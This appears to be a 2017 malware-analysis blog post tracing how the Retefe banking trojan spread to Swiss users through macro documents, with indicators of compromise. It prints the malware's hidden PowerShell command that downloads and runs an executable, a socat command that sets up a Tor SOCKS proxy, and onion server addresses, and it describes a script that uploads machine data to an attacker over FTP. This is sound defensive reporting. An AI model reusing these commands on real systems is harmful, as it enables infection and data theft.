Wednesday, 11 October 2017

Retefe Banking Trojan Updates Spreading Mechanism

There is a change in the spreading strategy of Retefe Banking Trojan in October 2017 while targeting Swiss users.

Earlier in September 2017, we observed it being spread through LNK files embedded in the Documents. You can refer my previous blog on it here.

Attack Flow in September 2017 -> Doc -> LNK -> powershell -> Retefe

However, in the second week of October 2017, it is being spread through Macro based Documents:

Attack flow in October 2017 -> Doc -> Macro -> powershell -> Retefe

Filename Patterns for the Documents sent in the campaign:


The Document displays a warning in German which prompts the user to enable macros in order to view the Document contents as shown in Figure 1.

Figure 1

Execution Flow

At first, Macro launches Powershell to download the payload from either one of the following URLs:


Below is the relevant PowerShell script which does this:

powershell -WindowStyle Hidden $webclient = new-object System.Net.WebClient;$myurls = 'hxxp://,hxxp://,hxxp://,hxxp://,hxxp://'.Split(',');$path = $env:temp + '\65536.exe';foreach($myurl in $myurls){try{$webclient.DownloadFile($myurl.ToString(), $path);Start-Process $path;break;}catch{}}

The downloaded payload is then executed by Powershell.

In our case, MD5 hash of the downloaded payload is: 6233e426bd6ade588463d268897f813b

Indicators of Compromise

1. Drops a JavaScript file in the Path: C:\ProgramData\<random_name>.<random_extension>

Below are the details of the Config File used by the JavaScript:

Tor Servers: dl: ["igs67efmlcucq57u.onion","jotetnnmfzb42sdw.onion","ou47twzxgnicn7ga.onion","aulqkm5upaqmto3i.onion"]
cert: It's a Comodo signed Cert with the Serial Number:  00 ff 66 fa 4e 0b 64 80 0e
ps: Certificate Installation Script
pstp: Base64 encoded Powershell script which will install TOR and Socat installer.
pslog: Base64 encoded Powershell script which will collect information about the machine and upload through FTP to attacker's server:

Once again, we don't observe the usage of Eternal Blue Exploit and there is no pseb section inside the config section of JavaScript.

3. Drops the file: Microsoft.Win32.TaskScheduler.dll in the path: %temp%\random\

This DLL is leveraged by the PowerShell script for the purpose of setting up a Scheduled Task.

4. Drops a Powershell script in the path: C:\ProgramData\<random_name>.ps1

This Powershell Script will set up the scheduled task which will execute both TOR and Socat to setup the SOCKS proxy as shown below:

socat.exe tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind= SOCKS4A:,socksport=9050

MD5 hashes of the Documents:


No comments:

Post a Comment